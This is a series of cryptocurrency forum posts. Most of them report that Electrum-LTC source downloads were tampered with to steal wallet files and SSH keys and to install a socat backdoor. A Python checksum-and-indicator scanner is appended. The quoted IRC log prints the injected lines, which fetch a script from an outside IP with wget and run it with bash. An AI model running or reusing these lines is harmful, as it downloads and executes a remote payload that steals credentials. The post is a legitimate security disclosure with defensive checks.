1  Economy / Services / Re: [FREE] BTC TX Accelerator - FAST - RELIABLE on: January 09, 2018, 02:29:34 PM
Please help me accelerate this tx:
f92daee31ba2ec8fcaebdf5c2e8babee9a034d51cb0e9df0381cf1df5caf1834

Thanks in advance :)
2  Alternate cryptocurrencies / Altcoin Discussion / Re: Warning: electrum-ltc source downloads (from electrum-ltc.org) were tampered on: August 01, 2017, 07:47:57 PM
Simply look up the checksums and check if they are matching your downloaded version. If they don't match you probably got infected...
3  Alternate cryptocurrencies / Altcoin Discussion / Re: Warning: electrum-ltc source downloads (from electrum-ltc.org) were tampered on: August 01, 2017, 05:39:25 PM
Quote
So I installed Electrum-Ltc on that day.
The only worry I have now that both BTC-Electrum and Vialectrum on my Fedora-machine could be compromised.

I don't know which of the mentioned days you meant. I don't know if the deployed script was changed (it is not available anymore), but the version I've seen did care for ~/.electrum but not for Viaelectrum.
4  Alternate cryptocurrencies / Altcoin Discussion / Warning: electrum-ltc source downloads (from electrum-ltc.org) were tampered on: August 01, 2017, 01:04:33 PM
I know this account is new and the following may therefore seem a bit like a smear campaign against the electrum-ltc dev. I can guarantee that the following statements are true and everything happened as described.

On July 30 I tried to install electrum-ltc but stopped in the process because the checksums were missing (404 Not Found).

On July 31 I tried again. This time the checksums (available in Electrum-LTC-2.8.3.5.tar.gz.DIGESTS.txt) were available. The checksums didn't match the downloaded archive!

Due to this mismatch I compared the download to the version available @ github.com.
My Result: Electrum-LTC-2.8.3.5.tar.gz (available at https://electrum-ltc.org/download/Electrum-LTC-2.8.3.5.tar.gz) was modified to download a shell script. This shell script proceeds to collect various files (wallet data for various wallets and ssh-keys) and sends them to a server. Additionally it installs a cronjob and a backdoor (based on socat).

As far as I know this issue only affects Unix/Mac users but I can't guarantee that there aren't payloads for other operating systems.

I've informed pooler (the electrum-ltc dev) on IRC and he confirmed that the files were tampered with. Currently the downloads are restored to a clean state. Sadly it seems like the developer didn't see any reason to inform his users about the issue. It looks like there is now a new hint reading "Always verify the digital signatures of the files you download!" (it wasn't there before: Proof)

Affected (Linux/Mac) users should be able to identify the infected electrum file by searching for 'import subprocess' or identify infected systems by checking their cronjobs.

Please don't ignore this post because my account is newly created. Members of #electrum-ltc or affected users should be able to confirm this report.

IRC log:
Quote
(18:39:45) got_inf3cted: Hello. Is it possible that https://electrum-ltc.org/download/Electrum-LTC-2.8.3.5.tar.gz is currently infected?
(18:59:29) skace: wait for pooler to respond
(18:59:38) skace: define infected
(19:00:58) pooler: got_inf3cted: what makes you think that?
(19:01:12) pooler: also, that's the source tarball, it's not even executable.
(19:02:00) got_inf3cted: The checksums aren't matching
(19:02:31) got_inf3cted: And of course:
(19:02:31) got_inf3cted: > subprocess.Popen(["wget", "http://80.67.8.195/script", "-O/tmp/script"], stdin=subprocess.PIPE, stderr=subprocess.PIPE)
(19:02:31) got_inf3cted: > subprocess.Popen(["bash", "/tmp/script"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
(19:02:55) skace: oh nice
(19:03:39) pooler: let me check
(19:04:05) got_inf3cted: The checksum file was unavailable yesterday. Today it is restored (and unchanged) but the .tar.gz is modified
(19:06:18) skace: got hacked?
(19:19:43) got_inf3cted: How are your checks going pooler? :D
(19:20:39) skace: i assume he is busy now
(19:20:41) skace: let him be :P
(19:22:25) got_inf3cted: It should be quite easy to confirm my findings and report back and take down the downloads/pages/servers (if needed)
(19:29:53) pooler: sorry, i have quite a few things on my plate
(19:30:09) pooler: the file was indeed compromised, trying to understand how
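
The two checks described in the post above (comparing the archive against the published digest, and searching the source for 'import subprocess'), as an added example that is not part of the original post or of the Electrum-LTC project. The `hexdigest  filename` layout of the digests file, the SHA-256 algorithm, and the sample file names are assumptions; the archives are constructed in memory, and any hit is a file to review against a known-clean copy.

```python
import hashlib
import io
import re
import tarfile

# Indicator named in the post: a subprocess import in the Python sources.
INDICATOR = re.compile(rb"^\s*(import subprocess|from subprocess import)", re.M)

def parse_digests(text):
    """Map filename -> expected SHA-256 from 'hexdigest  filename' lines (assumed layout)."""
    expected = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2 and re.fullmatch(r"[0-9a-fA-F]{64}", parts[0]):
            expected[parts[1].lstrip("*")] = parts[0].lower()
    return expected

def checksum_ok(archive_bytes, name, digests_text):
    """False on a mismatch and also when the digests file has no entry for `name`."""
    expected = parse_digests(digests_text).get(name)
    return expected is not None and hashlib.sha256(archive_bytes).hexdigest() == expected

def files_with_indicator(archive_bytes):
    """List .py members containing the indicator, read without extracting to disk."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar:
            if member.isfile() and member.name.endswith(".py"):
                if INDICATOR.search(tar.extractfile(member).read()):
                    hits.append(member.name)
    return sorted(hits)

def make_tarball(files):
    """Build a constructed sample .tar.gz in memory from {path: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

# Constructed samples (hypothetical names): a clean tree and one with an added import.
CLEAN = make_tarball({"sample/app.py": b"import sys\nprint(sys.argv)\n"})
TAMPERED = make_tarball({"sample/app.py": b"import subprocess\nimport sys\n"})
DIGESTS = hashlib.sha256(CLEAN).hexdigest() + "  sample.tar.gz\n"

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, checksum_ok(blob, "sample.tar.gz", DIGESTS), files_with_indicator(blob))
```

A digest file served from the same host as the archive can be replaced along with it, which is why the site's new hint points at signature verification rather than checksums alone.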

